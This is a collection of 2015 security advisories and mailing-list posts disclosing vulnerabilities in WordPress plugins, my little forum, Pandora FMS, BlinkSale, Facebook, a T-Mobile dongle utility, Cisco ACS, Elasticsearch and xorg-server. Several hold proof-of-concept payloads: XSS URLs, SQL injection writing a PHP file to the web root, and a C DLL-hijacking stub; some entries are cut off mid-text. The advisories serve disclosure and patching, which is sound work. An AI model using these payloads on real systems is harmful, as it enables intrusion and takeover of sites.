Two Reflected XSS Vulnerabilities in Easing Slider WordPress Plugin

[High-Tech Bridge Security Research]

Advisory ID: HTB23249
Product: Easing Slider WordPress Plugin
Vendor: Easing Slider
Vulnerable Version(s): 2.2.0.6 and probably prior
Tested Version: 2.2.0.6
Advisory Publication:  January 21, 2015  [without technical details]
Vendor Notification: January 21, 2015 
Vendor Patch: January 22, 2015 
Public Disclosure: February 11, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-1436
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in 
Easing Slider WordPress plugin, which can be exploited against administrators 
of WordPress (with the vulnerable plugin) to perform Cross-Site Scripting 
attacks.

Successful exploitation of the vulnerabilities may allow an attacker to steal 
administrator’s cookies and gain complete control over the website.

1) Two Reflected XSS Vulnerabilities in Easing Slider WordPress Plugin: 
CVE-2015-1436

1.1 The vulnerability exists due to insufficient sanitization of input data 
passed via the "edit" HTTP GET parameter to "/wp-admin/admin.php" script when 
"page" is set to "easingslider_manage_customizations". A remote attacker can 
trick a logged-in administrator to open a specially crafted link and execute 
arbitrary HTML and script code in browser in context of the vulnerable website. 

PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:

http://[host]/wp-admin/admin.php?page=easingslider_manage_customizations&edit=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient sanitization of input data 
passed via the "edit" HTTP GET parameter to "/wp-admin/admin.php" script when 
"page" is set to "easingslider_edit_sliders". A remote attacker can trick a 
logged-in administrator to open a specially crafted link and execute arbitrary 
HTML and script code in browser in context of the vulnerable website. 

PoC code below uses JS "alert()" function to display "ImmuniWeb" popup:

http://[host]/wp-admin/admin.php?page=easingslider_edit_sliders&edit=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E


---

Solution:

Update to Easing Slider 2.2.0.7

More Information:
https://wordpress.org/plugins/easing-slider/changelog/

---

References:

[1] High-Tech Bridge Advisory HTB23249 - 
https://www.htbridge.com/advisory/HTB23249 - Two Reflected XSS Vulnerabilities 
in Easing Slider WordPress Plugin.
[2] Easing Slider Wordpress plugin - http://easingslider.com - Easing Slider is 
an extremely easy to use slider plugin for WordPress.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Multiple Vulnerabilities in my little forum

[High-Tech Bridge Security Research]

Advisory ID: HTB23248
Product: my little forum
Vendor: http://mylittleforum.net/
Vulnerable Version(s): 2.3.3 and probably prior
Tested Version: 2.3.3
Advisory Publication:  January 14, 2015  [without technical details]
Vendor Notification: January 14, 2015 
Vendor Patch: February 8, 2015 
Public Disclosure: February 11, 2015 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]
CVE References: CVE-2015-1434, CVE-2015-1435
Risk Level: Medium 
CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 4.3 
(AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
my little forum, which can be exploited to perform SQL Injection and Cross-Site 
Scripting (XSS) attacks. The SQL injection vulnerabilities have medium risk 
assigned as they can be exploited under administrator account or via XSRF 
vector. 


1) SQL Injection in my little forum: CVE-2015-1434

1.1 Input passed via the "edit_category" HTTP GET parameter to "/index.php" 
script is not properly sanitised before being used in SQL query. This can be 
exploited to manipulate SQL queries by injecting arbitrary SQL code.

Simple PoC code below will create a file in web root with phpinfo() function 
(if MySQL has enough privileges, and current web user can write into the 
directory):

http://[host]/index.php?mode=admin&edit_category=' UNION SELECT 1,2,3,'' INTO OUTFILE '/var/www/file.php' -- 

1.2 Input passed via the "letter" HTTP GET parameter to "/index.php" script is 
not properly sanitised before being used in SQL query. This can be exploited to 
manipulate SQL queries by injecting arbitrary SQL code.

Simple PoC code below will create a file in web root with phpinfo() function 
(if MySQL has enough privileges, and current web user can write into the 
directory):

http://[host]/index.php?mode=admin&action=user&letter=' UNION SELECT '' INTO OUTFILE '/var/www/file.php' -- 

Both vulnerabilities require administrative privileges, however can be also 
exploited via XSRF vector to which the application is also vulnerable.


2) Cross-Site Scripting (XSS) in my little forum: CVE-2015-1435

2.1 Input passed via the "back" GET parameter to "/index.php" is not properly 
sanitised before being returned to the user. A remote attacker can trick a 
logged-in user to open a specially crafted link and execute arbitrary HTML and 
script code in browser in context of the vulnerable website.

PoC below uses JS "alert()" function to display a pop-up with "ImmuniWeb":

http://[host]/index.php?delete_posting=1&mode=posting&back=%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E


---

Solution:

Update to my little forum 2.3.4

More Information:
http://mylittleforum.net/forum/index.php?id=8182

---

References:

[1] High-Tech Bridge Advisory HTB23248 - 
https://www.htbridge.com/advisory/HTB23248 - Multiple Vulnerabilities in my 
little forum.
[2] my little forum - http://mylittleforum.net/ - my little forum is a simple 
PHP and MySQL based internet forum that displays the messages in classical 
threaded view (tree structure).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability

[Vulnerability Lab]

Document Title:
===
Facebook Bug Bounty #23 - Session ID & CSRF Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1432

Facebook Security ID: 10202805822321483

Video: https://www.youtube.com/watch?v=SAr2AGLrBkQ

Vulnerability Magazine: 
http://magazine.vulnerability-db.com/?q=articles/2015/02/03/facebook-security-12500-bug-bounty-reward-security-researcher


Release Date:
=
2015-02-03


Vulnerability Laboratory ID (VL-ID):

1432


Common Vulnerability Scoring System:

9.1


Product & Service Introduction:
===
Facebook is an online social networking service, whose name stems from the 
colloquial name for the book given to students 
at the start of the academic year by some university administrations in the 
United States to help students get to know 
each other. It was founded in February 2004 by Mark Zuckerberg with his college 
roommates and fellow Harvard University 
students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. 
The website`s membership was initially limited 
by the founders to Harvard students, but was expanded to other colleges in the 
Boston area, the Ivy League, and Stanford University. 
It gradually added support for students at various other universities before 
opening to high school students, and eventually to anyone 
aged 13 and over. Facebook now allows any users who declare themselves to be at 
least 13 years old to become registered users of the site.

Users must register before using the site, after which they may create a 
personal profile, add other users as friends, and exchange messages, 
including automatic notifications when they update their profile. Additionally, 
users may join common-interest user groups, organized by workplace, 
school or college, or other characteristics, and categorize their friends into 
lists such as `People From Work` or `Close Friends`. As of 
September 2012, Facebook has over one billion active users, of which 8.7% are 
fake. According to a May 2011 Consumer Reports survey, there are 
7.5 million children under 13 with accounts and 5 million under 10, violating 
the site`s terms of service.

In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer 
added $1 million of his own money to the pot. A January 2009 
Compete.com study ranked Facebook as the most used social networking service by 
worldwide monthly active users. Entertainment Weekly included the 
site on its end-of-the-decade `best-of` list, saying, `How on earth did we 
stalk our exes, remember our co-workers` birthdays, bug our friends, 
and play a rousing game of Scrabulous before Facebook?` Facebook eventually 
filed for an initial public offering on February 1, 2012, and was 
headquartered in Menlo Park, California. Facebook Inc. began selling stock to 
the public and trading on the NASDAQ on May 18, 2012. Based on its 
2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the 
first time, being placed at position of 462 on the list published in 2013.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook )


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered a session 
manipulation vulnerability and csrf bug in the official Facebook online service 
web-application.


Vulnerability Disclosure Timeline:
==
2015-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Facebook
Product: Framework - Content Management System 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

A remote session validation vulnerability and cross site request forgery bug 
has been discovered in the official Facebook online service web-application.
The vulnerability allows to execute functions without secure validation to 
compromise user content in the online service web-application of facebook.

Th vulnerability is located in the comment id and legacy id of the comments 
function. Remote attackers with low privileged user accounts are able to delete 
postings of other users without auth. The attacker can intercept the session 
and exchanged the comment and legacy id to delete or add for example comments.
The issue is known as critical and impact a high risk to other user account. To 
manipulate the attacker needs to intercept the session to manipulate the 
legacy and comment ids.

The security risk of the session validation vulnerability and csrf issue is 
estimated as critical with a cvss (common vulnerability scoring system) count 
of 9.1. 
Exploitation of the vulnerability requires a low privileged application user 
account and no user int

BlinkSale Bug Bounty #1 - Encode & Validation Vulnerability

[Vulnerability Lab]

Document Title:
===
BlinkSale Bug Bounty #1 - Encode & Validation Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1416


Release Date:
=
2015-02-06


Vulnerability Laboratory ID (VL-ID):

1416


Common Vulnerability Scoring System:

3.6


Product & Service Introduction:
===
We like to get paid. We’re sure you feel the same. So while you can use 
Blinksale and get paid by check, our integration 
with Stripe* makes it easy to get paid in a flash. Just sign up at Stripe, put 
your credentials into Blinksale, and you’re 
all set to accept credit card payments on your invoices!

(Copy of the Vendor Homepage: https://www.blinksale.com/ )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered an application-side input 
validation mail encoding web vulnerability in the official BlinkSale 
web-application.


Vulnerability Disclosure Timeline:
==
2015-01-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2015-01-20: Vendor Notification (BlinksaleSecurity Team)
2015-01-26: Vendor Response/Feedback (BlinksaleSecurity Team)
2015-02-03: Vendor Fix/Patch  (Blinksale Developer Team)
2015-02-06: Public Disclosure  (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Doublewide Partners
Product: Blinksale 2015 Q1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation mail encoding vulnerability has been discovered 
in the official BlinkSale company web-application.
The issue allows remote attackers to inject own malicious web context to the 
application-side of a vulnerable module or function.

The security vulnerability is located in the `firstname` and `lastname` input 
field values of the `signups` file. Remote attackers and 
local privileged application user accounts can exploit the issue to execute 
persistent malicious context in blinksale service mails.
The injection takes place in the signup POST method request with the vulnerable 
input values. The execution of the script code occurs 
on the application-side in the email after the introduction word `Hello` [X 
Username]. Attackers are able to inject iframes, img sources 
with onload alert or other script code tags. The service does not encode the 
input and has also no input restriction. After the code has 
been saved during the registration the internal service takes the wrong encoded 
dbms entries and stream them back in a notification mail 
to the users inbox.

The security risk of the persistent input validation web vulnerability in the 
mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.6. If the issue is existing in 
the main service values the other services can be affected by the 
issue too. Exploitation of the mail encoding and web-server validation 
vulnerability requires low or medium user interaction and no privileged 
customer application user account. Successful exploitation of the persistent 
mail encoding web vulnerability results in session hijacking, persistent 
phishing attacks, persistent redirects to external malicious source and 
persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] signups

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Module(s):
[+] Welcome to Blinksale!


Proof of Concept (PoC):
===
The application-side mail encoding web vulnerability can be exploited by remote 
attackers with low privileged application user accounta and low user 
interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.

1. Open the signup website of the blinksale portal 
(https://application.blinksale.com/signups)
2. Include random values to the email, password and inject a script code 
payload as firstname and lastname to the input fields. Save!
3. Go to the mail inbox and wait for the automatic reply with the persistent 
injected script code
4. Successful reproduce of the remote mail encoding vulnerability
Note: The issue can stream persistent malicious context in mails to existing 
users, new users or random emails to phish or spam!


PoC: Welcome to Blinksale!


  

  
Hello "><[APPLICATION-SIDE SCRIPT 
CODE EXECUTION VULNERABILITY!]iframe src="a" onload='alert("PENTEST")'>
Welcome to Blinksale, the easiest 

Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability

[Vulnerability Lab]

Document Title:
===
Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability


References (Source):

http://vulnerability-lab.com/get_content.php?id=1355


Release Date:
=
2015-02-09


Vulnerability Laboratory ID (VL-ID):

1355


Common Vulnerability Scoring System:

6.3


Product & Service Introduction:
===
Pandora FMS is a monitoring Open Source software. It watches your systems and 
applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a 
network interface down, a defacement 
in your website, a memory leak in one of your server application, or the 
movement of any value of the NASDAQ 
new technology market. 

* Detect new systems in network.
* Checks for availability or performance.
* Raise alerts when something goes wrong.
* Allow to get data inside systems with its own lite agents (for almost 
every Operating System).
* Allow to get data from outside, using only network probes. Including SNMP.


* Get SNMP Traps from generic network devices. 
* Generate real time reports and graphics.
* SLA reporting.
* User defined graphical views.
* Store data for months, ready to be used on reporting.
* Real time graphs for every module. 
* High availability for each component.
* Scalable and modular architecture.
* Supports up to 2500 modules per server.
* User defined alerts. Also could be used to react on incidents.
* Integrated incident manager.
* Integrated DB management: purge and DB compaction. 
* Multiuser, multi profile, multi group.
* Event system with user validation for operation in teams.
* Granularity of accesses and user profiles for each group and each user.
* Profiles could be personalized using up to eight security attributes 
without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each 
platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, 
and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: 
http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a SQL Injection web 
vulnerability in the official Pandora FMS monitoring web-application.


Vulnerability Disclosure Timeline:
==
2015-02-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Artica Sulociones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql injection web vulnerability has been discovered in the official 
Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows remote attackers and low privileged application user 
accounts to unauthorized execute sql commands 
that compromise the affected monitoring web-application and dbms.

The vulnerability is located in the offset value of the index list context 
module. Remote attackers and low privileged application 
user accounts are able to execute own sql commands via GET method request. The 
attacker can prepare a request through the `agentes` 
module to inject own sql commands on the affected web-application dbms.

The security risk of the sql injection vulnerability is estimated as critical 
with a cvss (common vulnerability scoring system) count of 6.3.
Exploitation of the remote sql injection web vulnerability requires no user 
interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in dbms, web-server 
and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] agentes
[+] agents_modules

Vulnerable Parameter(s):
[+] offset


Proof of Concept (PoC):
===
The sql injection web vulnerabilities can be exploited by local low privileged 
application user accounts in godmode without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

PoC:
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL
 INJECTION VULNERABILITY!]'--
http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL
 INJEC

T-Mobile Internet Manager - DLL Hijacking (mfc71enu.dll)

[Vulnerability Lab]

Document Title:
===
T-Mobile Internet Manager - DLL Hijacking (mfc71enu.dll)


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1427


Release Date:
=
2015-01-29


Vulnerability Laboratory ID (VL-ID):

1427


Common Vulnerability Scoring System:

5.6


Product & Service Introduction:
===
Lange Zeit war der sehr beliebte HSPA+ Surfstick Huawei E1823 alias Web`n`Walk 
Stick Business nur für Geschäftskunden 
verfügbar – zumindest wenn man ihn direkt über die Telekom bestellen wollte. 
Mit der heutigen Ankündigung, dass UMTS 
Netz ab sofort auf 21,6Mbit/s aufgerüstet zu haben, musste natürlich auch  eine 
Bezugsmöglichkeit für Privatkunden her. 
So gibt es den bis zu 28,8Mbit/s schnellen Stick nun direkt bei der Telekom für 
69,95€ ohne Vertrag bzw. für 4,95€ mit 
einem Datenvertrag. Der Stick hat keinen Simlock, kann also mit jeder Karte und 
in jedem Netz verwendet werden. 
Die Telekom preist auf der Produktseite des Sticks auch die Möglichkeit der 
weltweiten Nutzung an, die durch die 
vielen unterstützen Funkfrequenzen möglich wird.

(Copy of the Vendor Homepage: 
http://maxwireless.de/2011/webnwalk-stick-business-huawei-e1823-ab-sofort-bestellbar/
 )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a dll hijacking 
vulnerability in the T-Mobile Web’n’Walk Stick Business (Huawei E1823) Internet 
Manager v11.301.05.65.55 software.


Vulnerability Disclosure Timeline:
==
2015-01-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

T-Mobile
Product: Web`n`Walk Stick Business E1823 (USB) - Software 11.301.05.65.55


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

T-mobiles Web`n`Walk Stick software could allow a remote attacker to execute 
arbitrary code on the system. The software does 
not specify the fully qualified path to a dynamic-linked library 
(mfc71enu.dll). The windows software is vulnerable to dll hijacking 
attacks. The vulnerable version affects Microsoft Windows 
(wininstaller_11.301.05.65.55.zip).

HUAWEI Mobile Broadband
HSPA+ USB Sidebar
Model HUAWEI E1823 


Proof of Concept (PoC):
===
The dll hijacking vulnerability can be exploited by local attackers with low 
privileged system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Compile dll and rename to mfc71enu.dll or mfc71loc.dll
2. Copy mfc71enu.dll to C:\Program Files\T-Mobile\InternetManager_H
3. Launch T-Mobile Internet Manager
4. Successful reproduce of the local dll hijacking vulnerability!


PoC: Exploit
*/

#include 
 
int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}


PoC: Video
http://youtu.be/Go0iHJON7u4

Reference(s):
http://maxwireless.de/2011/webnwalk-stick-business-huawei-e1823-ab-sofort-bestellbar/
https://www.t-mobile.de/downloads/neu/wininstaller_11.301.05.65.55.zip


Security Risk:
==
The security risk of the local dll hijacking vulnerability in the mfc71enu.dll 
is estimated as medium. (CVSS 5.6)


Credits & Authors:
==
metacom


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com- ad...@evolution-sec.com
Section:magazine.vulnerability-db.com   - 
vulnerability-lab.com/contact.php - 
evolution-sec.com/contact
Social: twitter.com/#!

[ANN] MSKB 3004375 available for Windows 2000 and later too (but NOT from Mcirosoft)

[Stefan Kanthak]

Hi @ll,

yesterday Microsoft published the security advisory 3004375

announcing an update which enables Windows 7 and newer to log
the command lines used to start processes to the event log.

If you want to have this functionality on older versions of
Windows too see 
(but notice the license terms).

Limitation: command lines of processes that dont load USER32.DLL
are not logged. Fortunately almost all Win32 applications but
load USER32.DLL

JFTR: APPINIT.DLL works since 20 years.

regards
Stefan Kanthak

Cisco Security Advisory: Cisco Secure Access Control System SQL Injection Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Secure Access Control System SQL Injection Vulnerability

Advisory ID: cisco-sa-20150211-csacs

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150211-csacs

Revision 1.0

For Public Release 2015 February 11 16:00  UTC (GMT)

+-

Summary
===

Cisco Secure Access Control System (ACS) prior to version 5.5 patch 7 is 
vulnerable to a SQL injection attack in the ACS View reporting interface pages. 
A successful attack could allow an authenticated, remote attacker to access and 
modify information such as RADIUS accounting records stored in one of the ACS 
View databases or to access information in the underlying file system.

Cisco has released free software updates that address this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150211-csacs

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)

iQIVAwUBVNtpuopI1I6i1Mx3AQJ6/A/+JIKuQxiLmALGpAfX04MpmVAEQy5lntFb
4zNxT0JxqOXzXjYaGBC+8e/Ld0SXUi4sCuewQEXHTeEBSEQfyyGjk9tnjmSaMy6z
Qp7lAB/6qZEFHnVLbwhCoAAQiYheIk18jt7fdZM6jJ4sW8mjUx6LmIcPgdURDyQT
bZ8lTvmQNF6c/lBtIdbhxfMjOJYz1i5L5bjM0NrO0HH80jfgD7hYeNO0olROwo9D
ICDRz5w07UQ949/YRLG901UAIOs0Cyodnwy44ERJ3iH0bglvFIdeGyFlfzs0wnpT
/3XiAOJPnun9Uc6HZBbpgb1Y9ojITaxaT+OzOqi0CWG8rRqKyh1i+pO6ucmq3feE
h85uBW2T0cRemgf8zMNI+fH1lLgnhCZ32gxVsOnzreSET11kcecAFkAVWmYwo4sL
PornqaV3tRJDXpAsBVceMfGIhPz8GvFii8ZqaGaF+tCl7KuRtiXYeCOdVWHZMPie
vtfYgB2il/KpB6fy9tGpQ3YmBl3n+T3oOawdIAdMuxhHYm9owZIfk7K9VC2xCbY8
96xhmJFsOZErdP1vlc4HHgUeJGWhzNvdBiPUF+V1JcdqGldA7/92SmXigbDh8Lr/
spMQBnLhuyqV7ghL6zx5HLhlwOH2Ub3dS26Fxm2GeUa1fcAIgd4ME58hSt+T3J2l
pJXLh5SWb0w=
=KXWL
-END PGP SIGNATURE-

Elasticsearch vulnerability CVE-2015-1427

[Kevin Kluge]

Summary:
Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2 have vulnerabilities in the 
Groovy scripting engine.  The vulnerabilities allow an attacker to construct 
Groovy scripts that escape the sandbox and execute shell commands as the user 
running the Elasticsearch Java VM.  

We have been assigned CVE-2015-1427 for this.


Fixed versions:
Versions 1.3.8 and 1.4.3 disable sandboxing for Groovy by default.  As a 
consequence, dynamic script execution is disabled for Groovy.


Remediation:
Users should upgrade to 1.3.8 or 1.4.3.  Users that do not want to upgrade can 
address the vulnerabilities by setting script.groovy.sandbox.enabled to false 
in elasticseach.yml and restarting the node.

Also, we have published a procedure for moving trusted Groovy dynamic scripts 
to disk so that users can continue their use, even with Groovy dynamic 
scripting disabled.  This will require a small client change from the user.


Credit:
We received two reports of similar issues, one from the Cisco Systems 
Information Security Team and one from Cameron Morris.


CVSS:
Overall CVSS score: 5.8

[SECURITY] [DSA 3160-1] xorg-server security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-3160-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
February 11, 2015  http://www.debian.org/security/faq
- -

Package: xorg-server
CVE ID : CVE-2015-0255

Olivier Fourdan discovered that missing input validation in the Xserver's
handling of XkbSetGeometry requests may result in an information leak
or denial of service.

For the stable distribution (wheezy), this problem has been fixed in
version 2:1.12.4-6+deb7u6.

For the unstable distribution (sid), this problem has been fixed in
version 2:1.16.4-1.

We recommend that you upgrade your xorg-server packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJU24/HAAoJEBDCk7bDfE429IIP/0eu6jKzGfsjkB9lllWv1Q6W
PSJwM7k7++X22wTwBX6rY8anaV1ZeMhAnXU0i4a3+Tg3HfJKwjmI0I7AaAWS97Zi
v63goHpkbQN/W0hAtwNdSJQtCMwqdZ5H0vjInSks1U9zEa4Mz+VTTTaDhkjXOZgs
2rlOTs9+WIX6BCgfVwcVX+O+5GzT/DADJ5eEMsdOsREMHE5Bm0mvCm4FGE5Q/1Y8
CYFiiahhkfEwly62Y3OId5fJe9xexZd+DtXHX9sASpzxSR/Qu0dQ4zZdHIUScuT7
IuRmSZ74cL2n0IONjjeud5d3brrjiLOQMKBtx5BP+wmuERX81vmD8r7/GtxdXsu4
tofurVcb7ABsxG8kIizoUt9fm03yk8u8NuGSSRO2hoLncpOZvN3xV3YxW89Ru6Ip
W/KgLmYDtDvk7cK4FS9CX87j0Iqq5kM2J9pQPX96b77TlyoV2rKDjO0DUgHytTQM
nt5gyFmiDziH1F5U+E/sm/vp7gz30Hk+ql9EmS33sv6aTXCmoq84xVlpvCstQd7L
ZUjL7jO4jnitpQspRWyLfcLFM2JbNONN9h5wRcQZqQTAkKY1LaXLLJyldgUfUCzg
KttqqXVjl/u1q5iax+2Fgxp3eIRGMeT9MV01rxrQ3dGKZvU35WIV3RAXuwLGwmbb
8+5qPqqL+0hJJjeUORrC
=eFM3
-END PGP SIGNATURE-

Ninja Forms WordPress Plugin Multiple Cross-Site Scripting Vulnerability

[sn]

- Title: Ninja Forms WordPress Plugin Multiple Cross-Site Scripting 
Vulnerability
- Vulnerable Version: 2.8.8 and probably prior
 -Tested Version:2.8.8
 - Vendor Notification: 20 November 2014
 - Vendor Patch: 20 November 2014
 -Vulnerability Type: Cross-Site Scripting [CWE-79]
 -CVE Reference: TBC
- Discovered by: Sergio Navarro of Dionach
- - 

VULNERABILITY
Two XSS vulnerabilities have been discovered in Ninja Forms WordPress plugin 
which can be exploited against administrators of WordPress (with the vulnerable 
plugin) to perform Cross-Site Scripting
1)  Reflected XSS
The issue was found in the success notification message that the Ninja Forms 
plugin displays in users’ browser after users submit their details successfully 
through the plugin contact form. Anonymous attackers could use the 
vulnerability to take control of the victim’s browser or steal other users' 
sessions and so access their personal details.
Proof of concept:
POST 
http://www.example.com/wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit 
[…]
ninja_forms_field_1=TEST
[…]

--
2)Stored XSS
This issue was exploited when administrator users with access to the Ninja 
Forms submissions list attempt to edit the user submitted values. A malicious 
administration can hijack other users’ session, take control of another 
administrator’s browser or install malware on their computer.
Proof of concept:
POST http://www.example.com/wp-admin/post.php 
fields[1]=TEST 
-===
SOLUTION:
Update to Ninja Forms 2.8.11 which includes a fix for this vulnerability 
-===
Credits: Sergio Navarro of Dionach